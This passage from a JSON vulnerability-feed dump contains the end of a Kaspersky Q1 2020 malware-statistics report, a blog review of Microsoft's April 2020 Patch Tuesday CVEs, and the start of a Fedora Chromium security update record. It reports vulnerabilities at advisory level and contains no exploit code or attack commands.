target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**_;_ it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet user' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.** **\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers _**_Malware-class_**_ local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally faced at least one **Malware**-class local threat during Q1.", "modified": "2020-05-20T10:00:43", "published": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2020-08-07T08:03:36", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0687", "CVE-2020-0688", "CVE-2020-0699", "CVE-2020-0760", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0796", "CVE-2020-0821", "CVE-2020-0835", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0899", "CVE-2020-0900", "CVE-2020-0906", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0919", "CVE-2020-0920", "CVE-2020-0923", "CVE-2020-0924", "CVE-2020-0925", "CVE-2020-0926", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0930", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0933", "CVE-2020-0934", "CVE-2020-0935", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0943", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0954", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0961", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0971", "CVE-2020-0972", "CVE-2020-0973", "CVE-2020-0974", "CVE-2020-0975", "CVE-2020-0976", "CVE-2020-0977", "CVE-2020-0978", "CVE-2020-0979", "CVE-2020-0980", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0984", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0991", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1002", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1018", "CVE-2020-1019", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1026", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1049", "CVE-2020-1050", "CVE-2020-1094"], "description": "## Easiest task ever?\n\nMaking the reviews of Microsoft Patch Tuesday vulnerabilities should be an easy task. All vulnerability data is publicly available. Even better, dozens of reviews have already been written. Just read them, combine and post. Right? \n\n\n\nNot really. In fact it is quite boring and annoying. It may be fun to write about vulnerabilities that were already used in some real attacks. But this is a very small part of all vulnerabilities. What about more than a hundred others? They are like \u201csome vulnerability in some component may be used in some attack (or may be not)\u201d. If you describe each of them, no one will read or listen this. \n\nYou must choose what to highlight. And when I am reading the reports from [Tenable](<https://www.tenable.com/blog/microsoft-april-2020-patch-tuesday-addresses-113-cves-including-adobe-type-manager-library>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>) and [ZDI](<https://www.thezdi.com/blog/2020/4/14/the-april-2020-security-update-review>), I see that they choose very different groups of vulnerabilities, pretty much randomly.\n\n## My classification script\n\nThat's why I created a script that takes Patch Tuesday CVE data from microsoft.com and visualizes it giving me helicopter view on what can be interesting there. With nice grouping by vulnerability type and product, with custom icons for vulnerability types, coloring based on severity, etc.\n\n## Exploited in the wild\n\nApril 2020 Microsoft Patch Tuesday was published on 14.04.2020 and addressed 113 CVEs. 2 CVEs less than in March, but still too many to discuss them separately. 18 CVEs are critical (other reports say 19, but you can count it yourself) and 3 were exploited in the wild. These 3 are the most interesting, I've got them by "exploited" parameter in Microsoft CVE data.\n\n### Exploitation detected (3)\n\n#### Remote Code Execution\n\n * Adobe Font Manager Library ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>))\n\n#### Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>))\n\nMicrosoft has finally released a patch for the Adobe Type Manager vulnerability (CVE-2020-1020). The advisory [ADV200006](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006>) appeared on Microsoft website 23.03.2020, 3 week before this patch. The advisory stated, that this vulnerability was used in targeted attack in the wild. That's why it was discussed a lot. The idea is simple. If you open a special file or preview it in Explorer, remote code execution will occur. It is noted that previewing it in Microsoft Outlook is safe. This vulnerability is great for phishing attacks, in addition, it is also possible to exploit it through Web Distributed Authoring and Versioning (WebDAV). It is an extension of the HTTP that allows clients to perform remote Web content authoring operations. It is used, for example, in Microsoft SharePoint or ownCloud. And Microsoft claims that exploitation through WebDAV is the most likely attack vector.\n\nI called this vulnerability "confusing" in the title because:\n\n> To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.\n> \n> -- Rosyna Keller (@rosyna) [March 23, 2020](<https://twitter.com/rosyna/status/1242156545346916352?ref_src=twsrc%5Etfw>)\n\n 1. It has "Adobe" in the name, but is not really related to Adobe. Adobe gave Microsoft the source code of ATM Light for inclusion in Windows 2000/XP. Microsoft maintained this source code after that.\n 2. Microsoft initially stated that RCE exists in 40 version of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019. And this is huge. But then they added that exploitation was detected only for Windows 7. And they "do not recommend that IT administrators running Windows 10 implement the workarounds described" in advisory. For Windows Server 2016 and Windows Server 2019 the vulnerability is only "Important", not "Critical". And the most vulnerable systems won't get the updates by default: "to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU license". Yet another good reason to upgrade to a newer version.\n 3. The CVE number for this vulnerability was only assigned 3 weeks after it became publicly known. Before that, everyone called it by advisory ID ADV200006. So, CVE is not the ultimate identifier for vulnerabilities. And if you use only CVEs, some vulnerabilities will be out of scope. \n\nAnother vulnerability in the Adobe Font Manager Library (CVE-2020-0938) is very similar to previous CVE-2020-1020, although it impacts a different font renderer.\n\nThe last exploited vulnerability is the Elevation of Privilege (EoP) in Windows kernel (CVE-2020-1027). To exploit the vulnerability, a locally authenticated attacker should run a specially crafted application. Also all versions of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019 are vulnerable.\n\n> We discovered CVE-2020-1027 being exploited in the wild and reported it on 23 March under a 7-day deadline (used only for actively exploited bugs). Microsoft asked for an extension due to current global circumstances and we agreed. Patch details at <https://t.co/VF3SqXHYV9> (1/2)\n> \n> -- Tim Willis (@itswillis) [April 14, 2020](<https://twitter.com/itswillis/status/1250116355602419713?ref_src=twsrc%5Etfw>)\n\n## More likely to be exploited\n\nWhat else can be interesting? I filtered the CVEs with "Exploitation more likely" flag for current and older versions. \n\nAs you can see, the most interesting vulnerability is Scripting Engine Memory Corruption Vulnerability (CVE-2020-0968), which in fact affects Internet Explorer. An attacker can make a specially crafted website that is designed to exploit the vulnerability through Internet Explorer, or use the embedded an ActiveX control in application or Microsoft Office document. As a result, an attacker can execute arbitrary code in the context of the current user.\n\n### Exploitation more likely (7)\n\n#### Remote Code Execution\n\n * Internet Explorer ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>))\n\n#### Elevation of Privilege\n\n * DirectX ([CVE-2020-0784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0784>), [CVE-2020-0888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0888>))\n * Windows Graphics Component ([CVE-2020-1004](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1004>))\n * Windows Kernel ([CVE-2020-0956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0956>), [CVE-2020-0957](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0957>), [CVE-2020-0958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0958>))\n\nOther more likely to be exploitable vulnerabilities are Elevation of Privilege in DirectX, Windows Graphics Component and Windows Kernel. Not much information is available for them. "An attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system".\n\n## Groups by product\n\nWhat about other 103 vulnerabilities that are less likely to be exploited according to Microsoft. I made groups for products with more then 5 vulnerabilities.\n\n### Other Product based (52)\n\n#### Jet Database Engine\n\n * Remote Code Execution ([CVE-2020-0889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0889>), [CVE-2020-0953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0953>), [CVE-2020-0959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0959>), [CVE-2020-0960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0960>), [CVE-2020-0988](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0988>), [CVE-2020-0992](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0992>), [CVE-2020-0994](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0994>), [CVE-2020-0995](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0995>), [CVE-2020-0999](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0999>), [CVE-2020-1008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1008>))\n\n#### Media Foundation\n\n * Memory Corruption ([CVE-2020-0948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0948>), [CVE-2020-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0949>), [CVE-2020-0950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0950>))\n * Information Disclosure ([CVE-2020-0937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0937>), [CVE-2020-0939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0939>), [CVE-2020-0945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0945>), [CVE-2020-0946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0946>), [CVE-2020-0947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0947>))\n\n#### Microsoft SharePoint\n\n * Remote Code Execution ([CVE-2020-0920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0920>), [CVE-2020-0971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0971>), [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>))\n * Cross Site Scripting ([CVE-2020-0923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0923>), [CVE-2020-0924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0924>), [CVE-2020-0925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0925>), [CVE-2020-0926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0926>), [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>), [CVE-2020-0930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0930>), [CVE-2020-0933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0933>), [CVE-2020-0954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0954>), [CVE-2020-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0973>), [CVE-2020-0978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0978>))\n * Spoofing ([CVE-2020-0972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0972>), [CVE-2020-0975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0975>), [CVE-2020-0976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0976>), [CVE-2020-0977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0977>))\n\n#### Windows\n\n * Denial of Service ([CVE-2020-0794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0794>))\n * Elevation of Privilege ([CVE-2020-0934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0934>), [CVE-2020-0983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0983>), [CVE-2020-1009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1009>), [CVE-2020-1011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1011>), [CVE-2020-1015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015>))\n\n#### Windows Kernel\n\n * Elevation of Privilege ([CVE-2020-0913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0913>), [CVE-2020-1000](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1000>), [CVE-2020-1003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1003>))\n * Information Disclosure ([CVE-2020-0699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0699>), [CVE-2020-0821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0821>), [CVE-2020-0955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0955>), [CVE-2020-0962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0962>), [CVE-2020-1007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1007>))\n\nSo, the most interesting groups are Jet Database Engine and Microsoft SharePoint, both have RCEs. \n\n## Groups by vulnerability type\n\nAll other vulnerabilities in different products I combined by vulnerability type. Interesting EoP in OneDrive for Windows, but "most customers have been protected from this vulnerability because OneDrive has its own updater that periodically checks and updates the OneDrive binary".\n\n### Other Vulnerability Type based (51)\n\n#### Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-0969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0969>), [CVE-2020-0970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0970>))\n * Dynamics Business Central ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>))\n * GDI+ ([CVE-2020-0964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0964>))\n * Microsoft Excel ([CVE-2020-0906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0906>), [CVE-2020-0979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0979>))\n * Microsoft Graphics ([CVE-2020-0687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0687>))\n * Microsoft Graphics Components ([CVE-2020-0907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0907>))\n * Microsoft Office ([CVE-2020-0760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0760>), [CVE-2020-0991](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0991>))\n * Microsoft Office Access Connectivity Engine ([CVE-2020-0961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0961>))\n * Microsoft Windows Codecs Library ([CVE-2020-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0965>))\n * Microsoft Word ([CVE-2020-0980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0980>))\n * VBScript ([CVE-2020-0895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0895>), [CVE-2020-0966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0966>), [CVE-2020-0967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0967>))\n * Windows Hyper-V ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>))\n\n#### Authentication Bypass\n\n * Microsoft YourPhone Application for Android ([CVE-2020-0943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0943>))\n\n#### Denial of Service\n\n * Windows DNS ([CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>))\n\n#### Elevation of Privilege\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-0942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0942>), [CVE-2020-0944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0944>), [CVE-2020-1029](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1029>))\n * Microsoft (MAU) Office ([CVE-2020-0984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0984>))\n * Microsoft Defender ([CVE-2020-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0835>), [CVE-2020-1002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1002>))\n * Microsoft RMS Sharing App for Mac ([CVE-2020-1019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1019>))\n * Microsoft Remote Desktop App for Mac ([CVE-2020-0919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0919>))\n * Microsoft Visual Studio ([CVE-2020-0899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0899>))\n * Microsoft Windows Update Client ([CVE-2020-1014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1014>))\n * OneDrive for Windows ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>))\n * Visual Studio Extension Installer Service ([CVE-2020-0900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0900>))\n * Windows Hyper-V ([CVE-2020-0917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0917>), [CVE-2020-0918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0918>))\n * Windows Push Notification Service ([CVE-2020-0940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0940>), [CVE-2020-1001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1001>), [CVE-2020-1006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1006>), [CVE-2020-1017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1017>))\n * Windows Scheduled Task ([CVE-2020-0936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0936>))\n * Windows Update Stack ([CVE-2020-0985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0985>), [CVE-2020-0996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0996>))\n * Windows Work Folder Service ([CVE-2020-1094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1094>))\n\n#### Security Feature Bypass\n\n * MSR JavaScript Cryptography Library ([CVE-2020-1026](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1026>))\n * Windows Token ([CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>))\n\n#### Information Disclosure\n\n * Microsoft Dynamics Business Central/NAV ([CVE-2020-1018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1018>))\n * Microsoft Graphics Component ([CVE-2020-0982](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0982>), [CVE-2020-0987](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0987>), [CVE-2020-1005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1005>))\n * Windows GDI ([CVE-2020-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0952>))\n * Windows Push Notification Service ([CVE-2020-1016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1016>))\n\n#### Cross Site Scripting\n\n * Microsoft Dynamics 365 (On-Premise) ([CVE-2020-1049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1049>), [CVE-2020-1050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1050>))\n\nZero Day Initiative recommends to note Denial-of-Service in the Windows DNS service (CVE-2020-0993). "Considering the damage that could be done by an unauthenticated attacker". At the same time Microsoft website says: "To exploit the vulnerability, an **authenticated** attacker could send malicious DNS queries to a target, resulting in a denial of service". It seems like a mistake on ZDI or MS, but worth mentioning.\n\n## Updates for older vulners\n\nSo, that's it for April Patch Tuesday. What about the interesting vulnerabilities from February and March?\n\n 1. CVE-2020-0796 - Windows SMBv3 Client/Server Remote Code Execution Vulnerability. New exploit now available for this vulnerability, it's even in Metasplot. But it's not the one you have probably waited for. It does not attack remote hosts, it's [a local exploit for "(hopefully privileged) payload execution"](<https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0796_SMBGHOST>). \n**upd.** While I was working on this post I missed the news about CVE-2020-0796 RCE POC by Ricerca Security. The code is not available, here is [technical description](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) and [video](<https://vimeo.com/409855578>).\n 2. CVE-2020-0688 - Microsoft Exchange server "single e-mail" seizure. Exploit exists. Rapid7 made a [nice report](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>) "What we found was that **at least** 357,629 (82.5%) of the 433,464 Exchange servers we observed were known to be vulnerable."\n 3. CVE-2020-0684 - .LNK files processing. Nothing new.\n 4. CVE-2020-0662 - Mysterious Windows RCE. Nothing new.\n", "modified": "2020-04-26T01:24:38", "published": "2020-04-26T01:24:38", "id": "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "href": "http://feedproxy.google.com/~r/avleonov/~3/0BOlzDUoVDc/", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-20446", "CVE-2020-10531", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2020-03-20T01:51:25", "published": "2020-03-20T01:51:25", "id": "FEDORA:C3C866194B96", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: chromium-80.0.3987.132-1.fc31", "cvss": {"score": 9.3, "vector": 